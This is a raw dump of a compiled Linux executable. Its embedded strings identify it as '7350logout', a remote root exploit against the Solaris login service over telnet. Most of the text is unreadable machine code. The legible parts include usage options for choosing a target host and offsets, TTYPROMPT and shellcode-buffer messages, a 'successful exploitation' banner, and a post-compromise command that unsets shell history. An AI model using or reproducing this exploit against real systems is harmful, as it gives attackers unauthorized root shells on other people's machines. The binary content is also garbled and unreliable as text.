ELF4;4 (444666 8   /lib/ld-linux.so.2GNU%' &$!%  "   #[" '"_<8,6)<eL'L\ElH|0vw "9|̈,܈ m5 f,,<"L7\lX|'>S9̉C ܉97>9<C libc.so.6connectmemmoveusleepmemcpyperrormallocoptargsocketselectfflushsendcallocwritefprintfinet_addr__deregister_frame_inforeadmemcmpsscanfgetoptmemsetgetchargethostbynamestderrgetsockopthtons__errno_locationexit_IO_stdin_used__libc_start_mainstrlenfcntl__register_frame_infoclosefree__gmon_start__GLIBC_2.0ii Rx&|"      $(,048<@DHLPTX\`dh l!p$t%Ue#5%%h%h%h%h%h %h(%h0% h8p%h@`%hHP%hP@%hX0% h` %$hh%(hp%,hx%0h%4h%8h%<h%@h%Dh%Hh%Lhp%Ph`%ThP%Xh@%\h0%`h %dh%hh%lh%ph%th1^PTRh̫hćQVh8US[ä>tЋ]ÐU=u>PС8u丬t h ÐUU thh3ÐUÐUEPh|P?h|P)j<ÍvUEh`|PE U}EPxt&hE PEP7ˆUu -&U¼ƒ2t&EPEPhPtEP&t&ut&hhh®Pt#h|Pj(&t&EP$=td=su ?=xu*&h|P)j<Pd}~}w/}th@Dj,t&=uUЍX  Rhe|PjjPjE}#hy|PUjh=t/h|P)hhEPhhPEPk h|Pj h߯EPjZjhEPtj7hhPEP h|Pd=th |PEEPIh@|P=u =uhu|PvhhPEP: h|PjhưEPfh|PhhPEP h |PMh`|P7hPhEPEP9jt&ÉU@h@jP?EhEPEj EPEP¨Ph|PV=th@AAAEPEvPEPqEj EPEE};~1jaEP Ej EPEEǡƒ)щPjPEP5E+=~@PPhβ|PGPPh|P&=tPj7EPEPEPEj EPEEPNE+ PjEP0Ej EPjEh EPEU EU)‰U=~EPPh% EPPEPEUSEMEMEM'EMEMEE 8uFE 8uMʋM EMʋ] يE E뵐t&MEE8uDt&E8uMʋMEMʋ]يEE뷐t&MEMEjEPPEP;Eth1{jÍvUEEP¨UE}vX}u2EPEPEjEPpEjjEPEE룍vEM)ʉÉUEEE PjEE $EE PjPEPU;Ps0PREPh@|PojvP)UEE;Er)t&jPREUP E̓PRP REUPE PEPEPE=~E PEPhyG EPEM)ʉÐUEEE P PE PEPEEM)ʉt&ÉUEE}u(E REPMEE MՐt&EM)ʉÉUEE}u w&E UU\EUЊUʀ0EUЊU8ʀ0EUЊUр0EME 뇍EM)ʉÉUE EEE}u"EPEPWEM؉EM)ʉÉUE E} t E8 tEUÐUE EEEE tE   ,t&\t =trU\EU\EhU\EUЊUʀ0EUЊU8ʀ0EUЊUр0EUЊUEEM)ʉÉUEE}u#vE PEP$EM؍vEM)ʉÉUEExuuE REPEE REPEE REPkEE PEPRE~xusE PEP,EE REPEE REPEE REPEEM)ʉt&ÉUt&EPE PEPXE}uD=uh|P>h|P&j9=~+h~|PEPE Pj=uEPEPE P%u 7&UÍvUSEP9E s1gvEU EP)9Uv:EPPEPEPuU EM 1]ÍvUEE}tjEP( E}t&EPE PEPhE=t}~EPE PhEPE PEPmEE)E=t}~EPE Ph}~U)&+h|PUUE}w vEE 8u}v t&E @8uE 8uE @EnE @8uE 8uE @EJE @8tE @8tt&E @E"E @8t E @8tE @E}tjE PEP}vEPE PE POM EEE MUvÉUE UEUEEEEEjEPEPtÍvUh˴ihYEvUЍp<ukvUЍpRE@Ph=t)UЍtRh(Exh:ÉUS;1|E|M˃jjj|PE@P 1|t\hPjE}hAj@EPPEPMʃ]| t[hPEPE}hKjEPPjRhÉU WV`@󥤃EPEPhaEE;EvvEU ЍPPhu|PEƒuh{|PEƒh}|PEEEE;Er1E URh|PrEŃ|Plh|PF|PEEEƒEƒ)Љ‰UUEE}u [&h|PEƒu}th{|P|PM띃h|PEU‰UE;Er1E URh|PAEŃ|P;h|Pt&^_ÉUEPE}u6EPE}u 1EP UÍvU@WSEfE}u EEfEP‹EfPjjERE}uet&E P UBuEP*jjEPE}uEPvEPjEPE}uEPmt&EjEPEPE}})ƒ:stEPb}u &t&1 `ȉڐ1 ȉt&֋E`M˃EM˃EEEEPjP`PE@Pz E}u(EP hnX}u HMʃ]` u0Mʃ] uvMʃ]` Mʃ] taEEPEPjjEP }kn^}u't&G‹E; 2EPjEPE}uU[_ÉUWSDžpjjEPllPjEPhttu 1 Uȉhd݋EUM˃E xDž|xPjjEPE@P ttuYlPjEPttun&tu Mʃ]M t9lPjEPttuOHFlPjEPttunH[_ÍvU(EEE EE U9ErE8uEEEUPEEEE;Er@EUЋU Mʊ E UЀ8uEEUЋU Mʊ EE붋EE EE=tEPE Phq}u t&jhEPjhEPh|Ph@B-E=vPE PEP*E}U=~CEU ЍPPEU ЍPPE @RE Rh|P EE E)EEEh|PUÐUS=t Ѓ;u[UUS[ |]Solaris 2.6|2.7|2.8 x86Solaris 2.6|2.7|2.8 sparcManual target sparcManual target x86127.0.0.1usage: %s [-h] [-v] [-D] [-p] [-t num] [-a addr] [-d dst] -h display this usage -v increase verbosity -D DEBUG mode -T TTYPROMPT mode (try when normal mode fails) -p spawn ttyloop directly (use when problem arise) -t num select target type (zero for list) -a a acp option: set &args[0]. format: "[sx]:0x123" (manual offset, try 0x26500-0x28500, in 0x600 steps) -d dst destination ip or fqhn (default: 127.0.0.1) 7350logout - sparc|x86/solaris login remote root (version 0.7.0) -sc. team teso. ht:vDTpa:d:%u%c:0x%lxgive args address in [sx]:0x123 format, dumb pentester! invalid [sx] manual target WARNING: target out of list. list: # using target: %s failed to connect # setting TTYPROMPT geraTTYPROMPTlogin: # detected first login prompt foo 7350 pass # detected second login prompt ### attach and press enter! # send long login bait, waiting for password prompt # press enter at the prompt Password: # received password prompt, success? 7350 # waiting for shell (more than 15s hanging = failure) ## detected shell prompt, successful exploitation ########################################################################### unset HISTFILE;id;uname -a;uptime; @0`ЋP sP!# returning into 0x%08lx envcount = %d (0x%x) padding with %ld (0x%lx) chars 7350WIRE-BUFFERxp_setenv:sendno room to store shellcode (%lu bytes given, %u needed) CODE-BUFFERfailed telnet_prompt. failed exploitation. possible causes: # 1. login patched # 2. wrong target type (sparc|x86) # 3. weird/no solaris version <= 2.4 # 4. TTYPROMPT weirdness, try again with -T option # 5. try with -p -v options good luck. rbuf: from wireafter processing# telnetd either died or invalid response num . description ----+------------------------------------------------------- %3d | %s : 0x%08lx ' read userread remote................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~................................................................................................................................./* %s, %u bytes */ %02x | %c | to wirefirst,second: %02x %02x 2last,last: %02x %02x    " " "  /bin/ksh3XxRWPB